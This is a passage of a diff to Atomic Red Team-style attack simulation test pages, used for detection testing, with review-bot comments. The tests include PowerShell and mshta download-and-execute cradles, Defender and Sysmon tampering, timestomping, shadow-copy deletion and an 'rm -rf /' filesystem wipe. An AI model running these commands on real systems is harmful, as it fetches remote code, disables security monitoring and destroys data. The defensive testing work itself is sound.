+#### Cleanup Commands:
+```powershell
+Remove-Item $env:temp\*BloodHound.zip -Force
+```
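Review bot: the new cleanup `Remove-Item $env:temp\*BloodHound.zip -Force` raises an error whenever no archive exists (collection failed, or SharpHound wrote elsewhere); add `-ErrorAction Ignore`, as the T1099 cleanups in this same patch do. The executor change from `command_prompt` to `powershell` also changes the telemetry this test produces (no cmd.exe parent and no `powershell.exe "IEX ..."` command line), which deserves a sentence in the description since the test exists to exercise download-cradle detections.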
@@ -131,7 +133,7 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys
-Run mimikatz via PsSendKeys
+Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
**Supported Platforms:** Windows
@@ -180,39 +182,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
-## Atomic Test #6 - PowerShell Add User
-Using PS 5.1, add a user via CLI
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| user_name | username to add | string | atomic_user|
-| full_name | Full name of user | string | Atomic Red Team|
-| password | password to use | string | ATOM1CR3DT3@M|
-| description | Brief description of account | string | Atomic Things|
-
-
-#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
-
-
-```powershell
-New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #7 - Powershell MsXml COM object - no prompt
+## Atomic Test #6 - Powershell MsXml COM object - no prompt
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
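Review bot: the PowerShell Add User test is removed without explanation. As written it could never have succeeded, because `New-LocalUser -Password` expects a SecureString and `-Password #{password}` passes a plain string, so dropping it beats keeping a broken test; but account creation is a technique in its own right, and fixing the argument (`-Password (ConvertTo-SecureString '#{password}' -AsPlainText -Force)`) and relocating the test would preserve coverage rather than lose it. The commit message should at least say where it went.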
@@ -243,10 +213,10 @@ powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Ob
-## Atomic Test #8 - Powershell MsXml COM object - with prompt
-Provided by https://github.com/mgreen27/mgreen27.github.io
-Powershell MsXml COM object.
-Not proxy aware removing cache although does not appear to write to those locations
+## Atomic Test #7 - Powershell MsXml COM object - with prompt
+Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed.
+
+Provided by https://github.com/mgreen27/mgreen27.github.i
**Supported Platforms:** Windows
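Review bot: the attribution URL at the end of this hunk is truncated: `https://github.com/mgreen27/mgreen27.github.i` is missing the trailing `o`; the other tests in this file use `https://github.com/mgreen27/mgreen27.github.io`.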
@@ -274,9 +244,10 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
-## Atomic Test #9 - Powershell XML requests
+## Atomic Test #8 - Powershell XML requests
+Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed.
+
Provided by https://github.com/mgreen27/mgreen27.github.io
-Powershell xml download request
**Supported Platforms:** Windows
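Review bot: typo in the added description: "dispalyed" should be "displayed".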
@@ -293,7 +264,7 @@ Powershell xml download request
```cmd
-"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
+"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
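Review bot: removing `-windowstyle hidden` from the attack command changes what this test exercises. A hidden window combined with `-exec bypass -noprofile` is a common command-line indicator for download cradles, and detections keyed on it will no longer fire for this test. If the flag was dropped because the hidden window hid the "Download Cradle test success!" output used for verification, say so in the description, or keep the flag and verify from process telemetry instead.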
@@ -304,9 +275,10 @@ Powershell xml download request
-## Atomic Test #10 - Powershell invoke mshta.exe download
+## Atomic Test #9 - Powershell invoke mshta.exe download
+Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!".
+
Provided by https://github.com/mgreen27/mgreen27.github.io
-Powershell invoke mshta to download payload
**Supported Platforms:** Windows
@@ -319,11 +291,11 @@ Powershell invoke mshta to download payload
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
-#### Attack Commands: Run with `powershell`!
+#### Attack Commands: Run with `command_prompt`!
-```powershell
-"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
+```cmd
+C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
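Review bot: the executor is now `command_prompt` and the command is `C:\Windows\system32\cmd.exe /c "mshta.exe ..."`, so PowerShell is no longer involved at all; the title "Powershell invoke mshta.exe download" and the description "Powershell invoke mshta to download payload" are now misleading and should be reworded, or the command should stay a PowerShell invocation if the point is PowerShell spawning mshta. Launching `cmd.exe /c` from a cmd.exe executor is also redundant and only adds an extra cmd.exe child to the process tree.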
@@ -334,7 +306,7 @@ Powershell invoke mshta to download payload
-## Atomic Test #11 - Powershell Invoke-DownloadCradle
+## Atomic Test #10 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
@@ -356,8 +328,9 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
-## Atomic Test #12 - PowerShell Fileless Script Execution
-Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections.
+## Atomic Test #11 - PowerShell Fileless Script Execution
+Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that
+art-marker.txt is in the folder.
**Supported Platforms:** Windows
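Review bot: typo in the added description: "Upon exection" should be "Upon execution". The verification step points at `C:\Windows\Temp`, which requires administrative rights to write to; that is the reason for the Elevation Required flag added in the next hunk, and it is worth stating here so the reader does not have to infer it.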
@@ -365,7 +338,7 @@ Execution of a PowerShell payload from the Windows Registry similar to that seen
-#### Attack Commands: Run with `powershell`!
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
@@ -387,7 +360,7 @@ cmd /c REG DELETE "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /f
-## Atomic Test #13 - PowerShell Downgrade Attack
+## Atomic Test #12 - PowerShell Downgrade Attack
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
**Supported Platforms:** Windows
@@ -423,8 +396,8 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
-## Atomic Test #14 - NTFS Alternate Data Stream Access
-Creates a file with an alternate data stream and simulates executing that hidden code/file
+## Atomic Test #13 - NTFS Alternate Data Stream Access
+Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
**Supported Platforms:** Windows
diff --git a/Atomic_Threat_Coverage/Triggers/T1087.md b/Atomic_Threat_Coverage/Triggers/T1087.md
index 438beec..e1bd20f 100644
--- a/Atomic_Threat_Coverage/Triggers/T1087.md
+++ b/Atomic_Threat_Coverage/Triggers/T1087.md
@@ -165,7 +165,7 @@ username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
## Atomic Test #5 - Show if a user account has ever logged in remotely
Show if a user account has ever logged in remotely
-**Supported Platforms:** Linux, macOS
+**Supported Platforms:** Linux
diff --git a/Atomic_Threat_Coverage/Triggers/T1089.md b/Atomic_Threat_Coverage/Triggers/T1089.md
index 463a6a1..ecc2f17 100644
--- a/Atomic_Threat_Coverage/Triggers/T1089.md
+++ b/Atomic_Threat_Coverage/Triggers/T1089.md
@@ -239,7 +239,8 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
## Atomic Test #8 - Unload Sysmon Filter Driver
-Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.
+Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution,
+run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
**Supported Platforms:** Windows
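Review bot: duplicated phrase in the added description: "To verify successful execution, o verify successful execution," should be a single "To verify successful execution,". The sentence also tells the reader to "run the prereq_command's", but after this patch there are three prerequisite checks and only the last one ("sysmon filter must be loaded") is expected to fail; name that one.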
@@ -261,22 +262,45 @@ fltmc.exe unload #{sysmon_driver}
#### Cleanup Commands:
```cmd
-sc stop sysmon
-fltmc.exe load #{sysmon_driver}
-sc start sysmon
+sysmon -u -i > nul 2>&1
+sysmon -i -accepteula -i > nul 2>&1
+%temp%\Sysmon\sysmon.exe -u > nul 2>&1
+%temp%\Sysmon\sysmon.exe -accepteula -i > nul 2>&1
```
-#### Dependencies: Run with `command_prompt`!
-##### Description: Sysmon filter must be loaded
+#### Dependencies: Run with `powershell`!
+##### Description: Sysmon must be downloaded
##### Check Prereq Commands:
-```cmd
-fltmc.exe filters | findstr #{sysmon_driver}
+```powershell
+if ((cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") -or (Test-Path $env:Temp\Sysmon\Sysmon.exe)) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
-```cmd
-echo Automated installer not implemented yet, please install Sysmon manually
+```powershell
+Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$env:TEMP\Sysmon.zip"
+Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force
+Remove-Item $env:TEMP\Sysmon.zip -Force
+```
+##### Description: sysmon must be Installed
+##### Check Prereq Commands:
+```powershell
+if(sc.exe query sysmon | findstr sysmon) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+if(cmd.exe /c "where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul") { C:\Windows\Sysmon.exe -accepteula -i } else
+{ Set-Location $env:TEMP\Sysmon\; .\Sysmon.exe -accepteula -i}
+```
+##### Description: sysmon filter must be loaded
+##### Check Prereq Commands:
+```powershell
+if(fltmc.exe filters | findstr #{sysmon_driver}) { exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+sysmon -u
+sysmon -accepteula -i
```
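Review bot: the cleanup and the third Get Prereq reinstall Sysmon with `sysmon -accepteula -i` and no configuration file, which replaces whatever Sysmon configuration is deployed on the test host with the default one; on a detection lab this silently degrades the telemetry every other test depends on. Reload the filter with `fltmc.exe load #{sysmon_driver}` (which is what the removed cleanup did) or pass the existing configuration back in. Smaller points in the same hunk: `sysmon -u -i` and `sysmon -i -accepteula -i` each carry a stray `-i`; the second Get Prereq hardcodes `C:\Windows\Sysmon.exe` right after locating the binary with `where.exe`, so it fails when Sysmon sits elsewhere on PATH; and `sc.exe query sysmon | findstr sysmon` is case-sensitive, so it will not match if the service is registered as `Sysmon64`.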
@@ -533,7 +557,8 @@ Credit to Matt Graeber (@mattifestation) for the research.
## Atomic Test #16 - Tamper with Windows Defender ATP PowerShell
-Attempting to disable scheduled scanning and other parts of windows defender atp
+Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
+in Windows settings.
**Supported Platforms:** Windows
@@ -567,7 +592,8 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
## Atomic Test #17 - Tamper with Windows Defender Command Prompt
-Attempting to disable scheduled scanning and other parts of windows defender atp
+Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
+However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on.
**Supported Platforms:** Windows
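Review bot: the added sentence "These commands must be run as System, so they still fail as administrator" documents a test that is expected to fail. The Attack Commands header should say so, or the executor should run the commands as SYSTEM (for example via `PsExec -s`); otherwise an automated run reports success while the Defender state is unchanged. Write the account name as "SYSTEM".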
@@ -598,7 +624,8 @@ sc config WinDefend start=enabled
## Atomic Test #18 - Tamper with Windows Defender Registry
-Disable Windows Defender from starting after a reboot
+Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
+grayed out and have no info.
**Supported Platforms:** Windows
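Review bot: typo in the added description: "Upen execution" should be "Upon execution".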
@@ -626,7 +653,10 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
## Atomic Test #19 - Disable Microft Office Security Features
-Gorgon group may disable Office security features so that their code can run
+Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
+show any warning before editing the document
+
+
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows
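Review bot: this hunk inserts two blank lines between the description and the reference URL, which none of the other tests in this file have. The context heading "Disable Microft Office Security Features" (a typo for Microsoft) is pre-existing, but since the test is being touched and the TOC anchor is generated from the heading, fixing it here would be cheap.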
@@ -662,8 +692,10 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
## Atomic Test #20 - Remove Windows Defender Definition Files
-Removing definition files would cause ATP to not fire for AntiMalware
-Check MpCmdRun.exe man page for info on all arguments
+Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
+On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
+command will say completed.
+
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows
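Review bot: typos in the added description: "viersions" (versions), "inusfficient privelages" (insufficient privileges). The note that the MpCmdRun.exe command fails on 1909+ even as admin is valuable, but it should state whether the test is then expected to fail, as the Command Prompt tamper test above now does.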
diff --git a/Atomic_Threat_Coverage/Triggers/T1099.md b/Atomic_Threat_Coverage/Triggers/T1099.md
index b823637..51d1594 100644
--- a/Atomic_Threat_Coverage/Triggers/T1099.md
+++ b/Atomic_Threat_Coverage/Triggers/T1099.md
@@ -148,9 +148,8 @@ touch -acmr #{reference_file_path} #{target_file_path}
## Atomic Test #5 - Windows - Modify file creation timestamp with PowerShell
-Modifies the file creation timestamp of a specified file.
-
-This technique was seen in use by the Stitch RAT.
+Modifies the file creation timestamp of a specified file. This technique was seen in use by the Stitch RAT.
+To verify execution, use File Explorer to view the Properties of the file and observe that the Created time is the year 1970.
**Supported Platforms:** Windows
@@ -160,7 +159,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_path | Path of file to change creation timestamp | Path | $env:APPDATA\atomic.txt|
+| file_path | Path of file to change creation timestamp | Path | $env:TEMP\T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@@ -168,27 +167,37 @@ This technique was seen in use by the Stitch RAT.
```powershell
-New-Item #{file_path} -Force
-Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
-Remove-Item #{file_path} -Force
+Remove-Item #{file_path} -Force -ErrorAction Ignore
```
+#### Dependencies: Run with `powershell`!
+##### Description: A file must exist at the path (#{file_path}) to change the creation time on
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_path} -Force | Out-Null
+Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
+```
+
+
## Atomic Test #6 - Windows - Modify file last modified timestamp with PowerShell
-Modifies the file last modified timestamp of a specified file.
-
-This technique was seen in use by the Stitch RAT.
+Modifies the file last modified timestamp of a specified file. This technique was seen in use by the Stitch RAT.
+To verify execution, use File Explorer to view the Properties of the file and observe that the Modified time is the year 1970.
**Supported Platforms:** Windows
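Review bot: with file creation moved into Get Prereq Commands, the three T1099 PowerShell tests now share the default path `$env:TEMP\T1099_timestomp.txt` and each cleanup deletes it, so running them back-to-back needs the prerequisite step before every test; fine, but document it. The verification step ("use File Explorer ... year 1970") is not scriptable; `(Get-Item #{file_path}).CreationTime` gives the same answer from the shell the test already runs in.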
@@ -198,7 +207,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_path | Path of file to change last modified timestamp | Path | $env:APPDATA\atomic.txt|
+| file_path | Path of file to change modified timestamp | Path | $env:TEMP\T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@@ -206,27 +215,37 @@ This technique was seen in use by the Stitch RAT.
```powershell
-New-Item #{file_path} -Force
-Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
-Remove-Item #{file_path} -Force
+Remove-Item #{file_path} -Force -ErrorAction Ignore
```
+#### Dependencies: Run with `powershell`!
+##### Description: A file must exist at the path (#{file_path}) to change the modified time on
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_path} -Force | Out-Null
+Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
+```
+
+
## Atomic Test #7 - Windows - Modify file last access timestamp with PowerShell
-Modifies the last access timestamp of a specified file.
-
-This technique was seen in use by the Stitch RAT.
+Modifies the last access timestamp of a specified file. This technique was seen in use by the Stitch RAT.
+To verify execution, use File Explorer to view the Properties of the file and observe that the Accessed time is the year 1970.
**Supported Platforms:** Windows
@@ -236,7 +255,7 @@ This technique was seen in use by the Stitch RAT.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| file_path | Path of file to change last access timestamp | Path | $env:APPDATA\atomic.txt|
+| file_path | Path of file to change last access timestamp | Path | $env:TEMP\T1099_timestomp.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
@@ -244,18 +263,29 @@ This technique was seen in use by the Stitch RAT.
```powershell
-New-Item #{file_path} -Force
-Set-Content #{file_path} -Value "atomic test" -Force
Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" }
```
#### Cleanup Commands:
```powershell
-Remove-Item #{file_path} -Force
+Remove-Item #{file_path} -Force -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: A file must exist at the path (#{file_path}) to change the last access time on
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_path} -Force | Out-Null
+Set-Content #{file_path} -Value "T1099 Timestomp" -Force | Out-Null
```
-
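Review bot: this hunk inserts three blank lines between the cleanup block and `#### Dependencies`, while the matching hunks for tests #5 and #6 insert none; keep the spacing consistent across the three tests.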
diff --git a/Atomic_Threat_Coverage/Triggers/T1107.md b/Atomic_Threat_Coverage/Triggers/T1107.md
index d612a34..d274f42 100644
--- a/Atomic_Threat_Coverage/Triggers/T1107.md
+++ b/Atomic_Threat_Coverage/Triggers/T1107.md
@@ -20,19 +20,11 @@ There are tools available from the host operating system to perform cleanup, but
- [Atomic Test #7 - Delete an entire folder - Windows PowerShell](#atomic-test-7---delete-an-entire-folder---windows-powershell)
-- [Atomic Test #8 - Delete VSS - vssadmin](#atomic-test-8---delete-vss---vssadmin)
+- [Atomic Test #8 - Delete Filesystem - Linux](#atomic-test-8---delete-filesystem---linux)
-- [Atomic Test #9 - Delete VSS - wmic](#atomic-test-9---delete-vss---wmic)
+- [Atomic Test #9 - Delete-PrefetchFile](#atomic-test-9---delete-prefetchfile)
-- [Atomic Test #10 - bcdedit](#atomic-test-10---bcdedit)
-
-- [Atomic Test #11 - wbadmin](#atomic-test-11---wbadmin)
-
-- [Atomic Test #12 - Delete Filesystem - Linux](#atomic-test-12---delete-filesystem---linux)
-
-- [Atomic Test #13 - Delete-PrefetchFile](#atomic-test-13---delete-prefetchfile)
-
-- [Atomic Test #14 - Delete TeamViewer Log Files](#atomic-test-14---delete-teamviewer-log-files)
+- [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files)
@@ -125,203 +117,172 @@ shred -u #{file_to_shred}
## Atomic Test #4 - Delete a single file - Windows cmd
-Delete a single file from the temporary directory using cmd.exe
+Delete a single file from the temporary directory using cmd.exe.
+Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1107|
+
#### Attack Commands: Run with `command_prompt`!
```cmd
-echo "T1107" > %temp%\T1107.txt
-del /f %temp%\T1107.txt >nul 2>&1
+del /f #{file_to_delete}
```
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
+##### Check Prereq Commands:
+```cmd
+IF EXIST "#{file_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+echo deleteme_T1107 >> #{file_to_delete}
+```
+
+
## Atomic Test #5 - Delete an entire folder - Windows cmd
-Recursively delete the temporary directory and all files contained within it using cmd.exe
+Recursively delete a folder in the temporary directory using cmd.exe.
+Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | %temp%\deleteme_T1107|
+
#### Attack Commands: Run with `command_prompt`!
```cmd
-mkdir %temp%\T1107
-rmdir /s /q %temp%\T1107
+rmdir /s /q #{folder_to_delete}
```
+#### Dependencies: Run with `command_prompt`!
+##### Description: The file to delete must exist on disk at specified location (#{folder_to_delete})
+##### Check Prereq Commands:
+```cmd
+IF EXIST "#{folder_to_delete}" ( EXIT 0 ) ELSE ( EXIT 1 )
+```
+##### Get Prereq Commands:
+```cmd
+mkdir #{folder_to_delete}
+```
+
+
## Atomic Test #6 - Delete a single file - Windows PowerShell
-Delete a single file from the temporary directory using Powershell
+Delete a single file from the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the file was deleted.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_to_delete | File to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_T1107|
+
#### Attack Commands: Run with `powershell`!
```powershell
-New-Item $env:TEMP\T1107.txt
-Remove-Item -path $env:TEMP\T1107.txt
+Remove-Item -path #{file_to_delete}
```
+#### Dependencies: Run with `powershell`!
+##### Description: The file to delete must exist on disk at specified location (#{file_to_delete})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{file_to_delete}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{file_to_delete} | Out-Null
+```
+
+
## Atomic Test #7 - Delete an entire folder - Windows PowerShell
-Recursively delete the temporary directory and all files contained within it using Powershell
+Recursively delete a folder in the temporary directory using Powershell. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| folder_to_delete | Folder to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\deleteme_folder_T1107|
+
#### Attack Commands: Run with `powershell`!
```powershell
-New-Item $env:TEMP\T1107 -ItemType Directory
-Remove-Item -path $env:TEMP\T1107 -recurse
+Remove-Item -Path #{folder_to_delete} -Recurse
```
-
-
-
-
-
-## Atomic Test #8 - Delete VSS - vssadmin
-Delete all volume shadow copies with vssadmin.exe
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-vssadmin.exe Delete Shadows /All /Quiet
+#### Dependencies: Run with `powershell`!
+##### Description: The folder to delete must exist on disk at specified location (#{folder_to_delete})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{folder_to_delete}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{folder_to_delete} -Type Directory | Out-Null
```
-
-
-## Atomic Test #9 - Delete VSS - wmic
-Delete all volume shadow copies with wmic
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-wmic shadowcopy delete
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #10 - bcdedit
-This test leverages `bcdedit` to remove boot-time recovery measures.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-bcdedit /set {default} bootstatuspolicy ignoreallfailures
-bcdedit /set {default} recoveryenabled no
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #11 - wbadmin
-This test deletes Windows Backup catalogs.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
-
-
-```cmd
-wbadmin delete catalog -quiet
-```
-
-
-
-
-
-
-
-
-
-## Atomic Test #12 - Delete Filesystem - Linux
+## Atomic Test #8 - Delete Filesystem - Linux
This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
**Supported Platforms:** Linux
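Review bot: tests #4 and #5 now default to the same path, `%temp%\deleteme_T1107`, for a file and a folder respectively. Once test #4's prerequisite has created the file, test #5's `IF EXIST` check passes, `rmdir /s /q` on a file does nothing, and the `mkdir` in its Get Prereq fails; give the folder test its own default as the PowerShell pair does (`deleteme_folder_T1107`). The dependency description for test #5 also says "The file to delete" where it means the folder. Separately, the four removed tests (`vssadmin.exe Delete Shadows`, `wmic shadowcopy delete`, the bcdedit recovery changes, `wbadmin delete catalog`) are the standard pre-encryption steps of ransomware; the commit should say where they went (ATT&CK files them under Inhibit System Recovery), and any detection rules mapped to T1107 test numbers 8 through 11 need re-pointing.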
@@ -345,8 +306,9 @@ rm -rf / --no-preserve-root > /dev/null 2> /dev/null
-## Atomic Test #13 - Delete-PrefetchFile
-Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique.
+## Atomic Test #9 - Delete-PrefetchFile
+Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
+before and after the test to verify that the number of prefetch files decreases by 1.
**Supported Platforms:** Windows
@@ -369,34 +331,46 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
-## Atomic Test #14 - Delete TeamViewer Log Files
+## Atomic Test #10 - Delete TeamViewer Log Files
Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
-log file format of TeamViewerXX_Logfile.log
+log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
+
https://twitter.com/SBousseaden/status/1197524463304290305?s=20
-**Supported Platforms:** Windows, macOS
+**Supported Platforms:** Windows
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| teamviewer_log_file | Teamviewer log file to delete. Run the prereq command to create it if it does not exist. | string | $env:TEMP\TeamViewer_54.log|
+
#### Attack Commands: Run with `powershell`!
```powershell
-if ($env:os -eq "Windows_NT") {
- New-Item $env:TEMP\TeamViewer_54.log
- Remove-Item $env:TEMP\TeamViewer_54.log
-} else {
- New-Item $env:HOME\TeamViewer_54.log
- Remove-Item $env:HOME\TeamViewer_54.log
-}
+Remove-Item #{teamviewer_log_file}
```
+#### Dependencies: Run with `powershell`!
+##### Description: The folder to delete must exist on disk at specified location (#{teamviewer_log_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{teamviewer_log_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Path #{teamviewer_log_file} | Out-Null
+```
+
+
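Review bot: The added verification text and the Dependencies description both talk about a folder ("Use File Explorer to verify the folder was deleted", "The folder to delete must exist on disk"), but `#{teamviewer_log_file}` is a file, created with `New-Item -Path` and removed with `Remove-Item`; say "file" in both places. While these lines are being touched, "true-positive alert ration" in the unchanged context should read "ratio", and dropping macOS from Supported Platforms (the old block handled `$env:HOME` for non-Windows) is a coverage loss that should be stated explicitly rather than left implicit.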
diff --git a/Atomic_Threat_Coverage/Triggers/T1112.md b/Atomic_Threat_Coverage/Triggers/T1112.md
index 36fc90e..45c972b 100644
--- a/Atomic_Threat_Coverage/Triggers/T1112.md
+++ b/Atomic_Threat_Coverage/Triggers/T1112.md
@@ -14,21 +14,18 @@ The Registry of a remote system may be modified to aid in execution of files as
- [Atomic Test #2 - Modify Registry of Local Machine - cmd](#atomic-test-2---modify-registry-of-local-machine---cmd)
-- [Atomic Test #3 - Modify Registry of Another User Profile](#atomic-test-3---modify-registry-of-another-user-profile)
+- [Atomic Test #3 - Modify registry to store logon credentials](#atomic-test-3---modify-registry-to-store-logon-credentials)
-- [Atomic Test #4 - Modify registry to store logon credentials](#atomic-test-4---modify-registry-to-store-logon-credentials)
